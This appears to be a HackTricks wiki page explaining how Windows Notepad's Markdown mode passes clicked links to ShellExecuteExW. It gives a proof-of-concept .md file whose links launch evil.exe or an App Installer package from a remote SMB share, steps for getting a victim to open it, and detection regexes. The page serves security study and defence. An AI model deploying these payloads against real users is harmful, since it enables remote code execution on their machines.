HackTricks
Windows Protocol Handler / ShellExecute Abuse (Markdown Renderers)
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the π¬ Discord group or the telegram group or follow us on Twitter π¦ @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Modern Windows applications that render Markdown/HTML often turn user-supplied links into clickable elements and hand them to ShellExecuteExW. Without strict scheme allowlisting, any registered protocol handler (e.g., file:, ms-appinstaller:) can be triggered, leading to code execution in the current user context.
ShellExecuteExW surface in Windows Notepad Markdown mode
- Notepad chooses Markdown mode only for
.mdextensions via a fixed string comparison insub_1400ED5D0(). - Supported Markdown links:
- Standard:
[text](target) - Autolink:
<target>(rendered as[target](target)), so both syntaxes matter for payloads and detections.
- Standard:
- Link clicks are processed in
sub_140170F60(), which performs weak filtering and then callsShellExecuteExW. ShellExecuteExWdispatches to any configured protocol handler, not just HTTP(S).
Payload considerations
- Any
\\sequences in the link are normalized to\beforeShellExecuteExW, impacting UNC/path crafting and detection. .mdfiles are not associated with Notepad by default; the victim must still open the file in Notepad and click the link, but once rendered, the link is clickable.- Dangerous example schemes:
file://to launch a local/UNC payload.ms-appinstaller://to trigger App Installer flows. Other locally registered schemes may also be abusable.
Minimal PoC Markdown
[run](file://\\192.0.2.10\\share\\evil.exe)
<ms-appinstaller://\\192.0.2.10\\share\\pkg.appinstaller>
Exploitation flow
- Craft a
.mdfile so Notepad renders it as Markdown. - Embed a link using a dangerous URI scheme (
file:,ms-appinstaller:, or any installed handler). - Deliver the file (HTTP/HTTPS/FTP/IMAP/NFS/POP3/SMTP/SMB or similar) and convince the user to open it in Notepad.
- On click, the normalized link is handed to
ShellExecuteExWand the corresponding protocol handler executes the referenced content in the userβs context.
Detection ideas
- Monitor transfers of
.mdfiles over ports/protocols that commonly deliver documents:20/21 (FTP),80 (HTTP),443 (HTTPS),110 (POP3),143 (IMAP),25/587 (SMTP),139/445 (SMB/CIFS),2049 (NFS),111 (portmap). - Parse Markdown links (standard and autolink) and look for case-insensitive
file:orms-appinstaller:. - Vendor-guided regexes to catch remote resource access:
(\x3C|\[[^\x5d]+\]\()file:(\x2f|\x5c\x5c){4}
(\x3C|\[[^\x5d]+\]\()ms-appinstaller:(\x2f|\x5c\x5c){2}
- Patch behavior reportedly allowlists local files and HTTP(S); anything else reaching
ShellExecuteExWis suspicious. Extend detections to other installed protocol handlers as needed, since attack surface varies by system.
References
Tip
Learn & practice AWS Hacking:
Learn & practice GCP Hacking:
Learn & practice Az Hacking:Support HackTricks
- Check the subscription plans!
- Join the π¬ Discord group or the telegram group or follow us on Twitter π¦ @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.